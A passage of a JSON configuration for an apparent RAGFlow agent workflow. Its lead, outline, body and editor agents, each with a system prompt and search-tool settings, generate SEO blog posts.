                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.5,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 3,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Precise",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.5,
                            "prompts": [
                                {
                                    "content": "The user query is {sys.query}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n   - `Outline Agent` \u2192 Create the blog outline.\n\n   - `Body Agent` \u2192 Write all sections based on outline.\n\n   - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n  - keyword 1\n\n  - keyword 2\n\n  - keyword 3\n\n  - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
                            "temperature": "0.1",
                            "temperatureEnabled": true,
                            "tools": [
                                {
                                    "component_name": "Agent",
                                    "id": "Agent:SlickSpidersTurn",
                                    "name": "Outline Agent",
                                    "params": {
                                        "delay_after_error": 1,
                                        "description": "Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
                                        "exception_comment": "",
                                        "exception_default_value": "",
                                        "exception_goto": [],
                                        "exception_method": null,
                                        "frequencyPenaltyEnabled": false,
                                        "frequency_penalty": 0.3,
                                        "llm_id": "deepseek-chat@DeepSeek",
                                        "maxTokensEnabled": false,
                                        "max_retries": 3,
                                        "max_rounds": 2,
                                        "max_tokens": 4096,
                                        "mcp": [],
                                        "message_history_window_size": 12,
                                        "outputs": {
                                            "content": {
                                                "type": "string",
                                                "value": ""
                                            }
                                        },
                                        "parameter": "Balance",
                                        "presencePenaltyEnabled": false,
                                        "presence_penalty": 0.2,
                                        "prompts": [
                                            {
                                                "content": "{sys.query}",
                                                "role": "user"
                                            }
                                        ],
                                        "sys_prompt": "# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n  - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n  - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
                                        "temperature": 0.5,
                                        "temperatureEnabled": true,
                                        "tools": [
                                            {
                                                "component_name": "TavilySearch",
                                                "name": "TavilySearch",
                                                "params": {
                                                    "api_key": "",
                                                    "days": 7,
                                                    "exclude_domains": [],
                                                    "include_answer": false,
                                                    "include_domains": [],
                                                    "include_image_descriptions": false,
                                                    "include_images": false,
                                                    "include_raw_content": true,
                                                    "max_results": 5,
                                                    "outputs": {
                                                        "formalized_content": {
                                                            "type": "string",
                                                            "value": ""
                                                        },
                                                        "json": {
                                                            "type": "Array<Object>",
                                                            "value": []
                                                        }
                                                    },
                                                    "query": "sys.query",
                                                    "search_depth": "basic",
                                                    "topic": "general"
                                                }
                                            }
                                        ],
                                        "topPEnabled": false,
                                        "top_p": 0.85,
                                        "user_prompt": "This is the order you need to send to the agent.",
                                        "visual_files_var": ""
                                    }
                                },
                                {
                                    "component_name": "Agent",
                                    "id": "Agent:IcyPawsRescue",
                                    "name": "Body Agent",
                                    "params": {
                                        "delay_after_error": 1,
                                        "description": "Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
                                        "exception_comment": "",
                                        "exception_default_value": "",
                                        "exception_goto": [],
                                        "exception_method": null,
                                        "frequencyPenaltyEnabled": false,
                                        "frequency_penalty": 0.5,
                                        "llm_id": "deepseek-chat@DeepSeek",
                                        "maxTokensEnabled": false,
                                        "max_retries": 3,
                                        "max_rounds": 3,
                                        "max_tokens": 4096,
                                        "mcp": [],
                                        "message_history_window_size": 12,
                                        "outputs": {
                                            "content": {
                                                "type": "string",
                                                "value": ""
                                            }
                                        },
                                        "parameter": "Precise",
                                        "presencePenaltyEnabled": false,
                                        "presence_penalty": 0.5,
                                        "prompts": [
                                            {
                                                "content": "{sys.query}",
                                                "role": "user"
                                            }
                                        ],
                                        "sys_prompt": "# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
                                        "temperature": 0.2,
                                        "temperatureEnabled": true,
                                        "tools": [
                                            {
                                                "component_name": "TavilySearch",
                                                "name": "TavilySearch",
                                                "params": {
                                                    "api_key": "",
                                                    "days": 7,
                                                    "exclude_domains": [],
                                                    "include_answer": false,
                                                    "include_domains": [],
                                                    "include_image_descriptions": false,
                                                    "include_images": false,
                                                    "include_raw_content": true,
                                                    "max_results": 5,
                                                    "outputs": {
                                                        "formalized_content": {
                                                            "type": "string",
                                                            "value": ""
                                                        },
                                                        "json": {
                                                            "type": "Array<Object>",
                                                            "value": []
                                                        }
                                                    },
                                                    "query": "sys.query",
                                                    "search_depth": "basic",
                                                    "topic": "general"
                                                }
                                            }
                                        ],
                                        "topPEnabled": false,
                                        "top_p": 0.75,
                                        "user_prompt": "This is the order you need to send to the agent.",
                                        "visual_files_var": ""
                                    }
                                },
                                {
                                    "component_name": "Agent",
                                    "id": "Agent:TenderAdsAllow",
                                    "name": "Editor Agent",
                                    "params": {
                                        "delay_after_error": 1,
                                        "description": "Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
                                        "exception_comment": "",
                                        "exception_default_value": "",
                                        "exception_goto": [],
                                        "exception_method": null,
                                        "frequencyPenaltyEnabled": false,
                                        "frequency_penalty": 0.5,
                                        "llm_id": "deepseek-chat@DeepSeek",
                                        "maxTokensEnabled": false,
                                        "max_retries": 3,
                                        "max_rounds": 2,
                                        "max_tokens": 4096,
                                        "mcp": [],
                                        "message_history_window_size": 12,
                                        "outputs": {
                                            "content": {
                                                "type": "string",
                                                "value": ""
                                            }
                                        },
                                        "parameter": "Precise",
                                        "presencePenaltyEnabled": false,
                                        "presence_penalty": 0.5,
                                        "prompts": [
                                            {
                                                "content": "{sys.query}",
                                                "role": "user"
                                            }
                                        ],
                                        "sys_prompt": "# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
                                        "temperature": 0.2,
                                        "temperatureEnabled": true,
                                        "tools": [],
                                        "topPEnabled": false,
                                        "top_p": 0.75,
                                        "user_prompt": "This is the order you need to send to the agent.",
                                        "visual_files_var": ""
                                    }
                                }
                            ],
                            "topPEnabled": false,
                            "top_p": 0.75,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "begin"
                    ]
                },
                "Message:ModernSwansThrow": {
                    "downstream": [],
                    "obj": {
                        "component_name": "Message",
                        "params": {
                            "content": [
                                "{Agent:LuckyApplesGrab@content}"
                            ]
                        }
                    },
                    "upstream": [
                        "Agent:LuckyApplesGrab"
                    ]
                },
                "begin": {
                    "downstream": [
                        "Agent:LuckyApplesGrab"
                    ],
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "enablePrologue": true,
                            "inputs": {},
                            "mode": "conversational",
                            "prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
                        }
                    },
                    "upstream": []
                }
            },
            "globals": {
                "sys.conversation_turns": 0,
                "sys.files": [],
                "sys.query": "",
                "sys.user_id": ""
            },
            "graph": {
                "edges": [
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__beginstart-Agent:LuckyApplesGrabend",
                        "source": "begin",
                        "sourceHandle": "start",
                        "target": "Agent:LuckyApplesGrab",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:LuckyApplesGrabstart-Message:ModernSwansThrowend",
                        "source": "Agent:LuckyApplesGrab",
                        "sourceHandle": "start",
                        "target": "Message:ModernSwansThrow",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:LuckyApplesGrabagentBottom-Agent:SlickSpidersTurnagentTop",
                        "source": "Agent:LuckyApplesGrab",
                        "sourceHandle": "agentBottom",
                        "target": "Agent:SlickSpidersTurn",
                        "targetHandle": "agentTop"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:LuckyApplesGrabagentBottom-Agent:IcyPawsRescueagentTop",
                        "source": "Agent:LuckyApplesGrab",
                        "sourceHandle": "agentBottom",
                        "target": "Agent:IcyPawsRescue",
                        "targetHandle": "agentTop"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:LuckyApplesGrabagentBottom-Agent:TenderAdsAllowagentTop",
                        "source": "Agent:LuckyApplesGrab",
                        "sourceHandle": "agentBottom",
                        "target": "Agent:TenderAdsAllow",
                        "targetHandle": "agentTop"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:SlickSpidersTurntool-Tool:ThreeWallsRingend",
                        "source": "Agent:SlickSpidersTurn",
                        "sourceHandle": "tool",
                        "target": "Tool:ThreeWallsRing",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:IcyPawsRescuetool-Tool:FloppyJokesItchend",
                        "source": "Agent:IcyPawsRescue",
                        "sourceHandle": "tool",
                        "target": "Tool:FloppyJokesItch",
                        "targetHandle": "end"
                    }
                ],
                "nodes": [
                    {
                        "data": {
                            "form": {
                                "enablePrologue": true,
                                "inputs": {},
                                "mode": "conversational",
                                "prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
                            },
                            "label": "Begin",
                            "name": "begin"
                        },
                        "dragging": false,
                        "id": "begin",
                        "measured": {
                            "height": 48,
                            "width": 200
                        },
                        "position": {
                            "x": 38.19445084117184,
                            "y": 183.9781832844475
                        },
                        "selected": false,
                        "sourcePosition": "left",
                        "targetPosition": "right",
                        "type": "beginNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 3,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "The user query is {sys.query}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n   - `Outline Agent` \u2192 Create the blog outline.\n\n   - `Body Agent` \u2192 Write all sections based on outline.\n\n   - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n  - keyword 1\n\n  - keyword 2\n\n  - keyword 3\n\n  - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
                                "temperature": "0.1",
                                "temperatureEnabled": true,
                                "tools": [],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Lead Agent"
                        },
                        "id": "Agent:LuckyApplesGrab",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 350,
                            "y": 200
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "content": [
                                    "{Agent:LuckyApplesGrab@content}"
                                ]
                            },
                            "label": "Message",
                            "name": "Response"
                        },
                        "dragging": false,
                        "id": "Message:ModernSwansThrow",
                        "measured": {
                            "height": 56,
                            "width": 200
                        },
                        "position": {
                            "x": 669.394830760932,
                            "y": 190.72421137520644
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "messageNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.3,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 2,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Balance",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.2,
                                "prompts": [
                                    {
                                        "content": "{sys.query}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n  - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n  - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
                                "temperature": 0.5,
                                "temperatureEnabled": true,
                                "tools": [
                                    {
                                        "component_name": "TavilySearch",
                                        "name": "TavilySearch",
                                        "params": {
                                            "api_key": "",
                                            "days": 7,
                                            "exclude_domains": [],
                                            "include_answer": false,
                                            "include_domains": [],
                                            "include_image_descriptions": false,
                                            "include_images": false,
                                            "include_raw_content": true,
                                            "max_results": 5,
                                            "outputs": {
                                                "formalized_content": {
                                                    "type": "string",
                                                    "value": ""
                                                },
                                                "json": {
                                                    "type": "Array<Object>",
                                                    "value": []
                                                }
                                            },
                                            "query": "sys.query",
                                            "search_depth": "basic",
                                            "topic": "general"
                                        }
                                    }
                                ],
                                "topPEnabled": false,
                                "top_p": 0.85,
                                "user_prompt": "This is the order you need to send to the agent.",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Outline Agent"
                        },
                        "dragging": false,
                        "id": "Agent:SlickSpidersTurn",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 100.60137004146719,
                            "y": 411.67654846431367
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 3,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "{sys.query}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [
                                    {
                                        "component_name": "TavilySearch",
                                        "name": "TavilySearch",
                                        "params": {
                                            "api_key": "",
                                            "days": 7,
                                            "exclude_domains": [],
                                            "include_answer": false,
                                            "include_domains": [],
                                            "include_image_descriptions": false,
                                            "include_images": false,
                                            "include_raw_content": true,
                                            "max_results": 5,
                                            "outputs": {
                                                "formalized_content": {
                                                    "type": "string",
                                                    "value": ""
                                                },
                                                "json": {
                                                    "type": "Array<Object>",
                                                    "value": []
                                                }
                                            },
                                            "query": "sys.query",
                                            "search_depth": "basic",
                                            "topic": "general"
                                        }
                                    }
                                ],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "This is the order you need to send to the agent.",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Body Agent"
                        },
                        "dragging": false,
                        "id": "Agent:IcyPawsRescue",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 439.3374395738501,
                            "y": 366.1408588516909
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 2,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "{sys.query}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "This is the order you need to send to the agent.",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Editor Agent"
                        },
                        "dragging": false,
                        "id": "Agent:TenderAdsAllow",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 730.8513124709204,
                            "y": 327.351197329827
                        },
                        "selected": false,
                        "sourcePosition": "right",
